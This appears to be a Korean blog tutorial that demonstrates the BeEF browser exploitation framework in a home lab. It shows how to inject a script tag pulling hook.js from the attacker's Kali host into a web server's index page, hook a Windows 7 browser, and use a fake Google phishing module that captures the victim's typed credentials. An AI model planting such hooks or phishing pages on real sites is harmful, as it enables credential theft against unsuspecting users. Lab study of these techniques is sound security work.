이제 BeEF라는 툴을 사용해보자
Kali에서 beef-xss를 입력해보자
잠시 기다리면 웹 브라우저가 뜨면서 이런 페이지가 뜬다
(에러라면 다시 실행해보자)
이제 Username Password 를 입력하는데 기본적으로 id beef password beef 로 접속하면된다
첫 로그인 화면이다
이제 BackTrack에서 웹 서버를 시작해 스크립트를 넣어보겠다
service apache2 start
cd /var/www
vim index.html
index.html을 vim 으로 연거고 이제 스크립트를 추가 해야한다
아무것도 누르지 않은 상태에서 이렇게 하면된다
O (한칸밑줄쓰기모드) <script src="http://칼리의주소:3000/hook.js"></script>
ESC
:wq 엔터
이제 다른 클라이언트(windows 7)로
웹 서버(BackTrack)으로 접속해보자
(192.168.17.40 은 BackTrack의 주소다)
이렇게 기본 아파치 서버 설치시 나타나는 화면이 뜬다
사실 이렇게 보이기는 하지만 삽입한 스크립트도 동작하게 된다
다시 Kali로 돌아와서 beef-xss 를 보면
192.168.17.141 (Windows 7 ip) 가 보일 것이다
세부 정보들을 볼 수있다
이제 command 탭에 가보자
여러가지 취약점을 볼수 있다
색깔로 위험정도가 표시되어있다
Browser > Hooked Domain > Create Alert Dialog를 클릭하자
스샷엔 Create Alert Dialog가 없지만 밑에 있다
오른쪽에 Alert text라는 곳에
뛰울 메세지를 적어놓자
여기선 Hello world!!를 입력했다
이제 밑에 Execute를 클릭하고
Windows 7으로 가보자
웹브라우저에 웹 페이지 메시지가 Hello world!! 가 떠있는 것을 볼 수 있다
이번엔 다른 걸 해보자
Social Engineering > Google Phishing을 선택한다
Execute를 클릭하자
다시 Windows 7 에 가보면 Google사이트로 변한걸 알수있다
ID 와 PASSWORD를 입력해보자
임의로 test / test 를 입력했다
진짜 Google 사이트의 로그인 화면으로 redirect 된것을 볼수 있다
다시 Kali로 와보자
Module Results History에서
실행한 id를 누르면 오른쪽 Command results 에서
data: result=Username: test Password:test 라고
windows7에서 입력한 ID와 PASSWORD를 볼 수 있다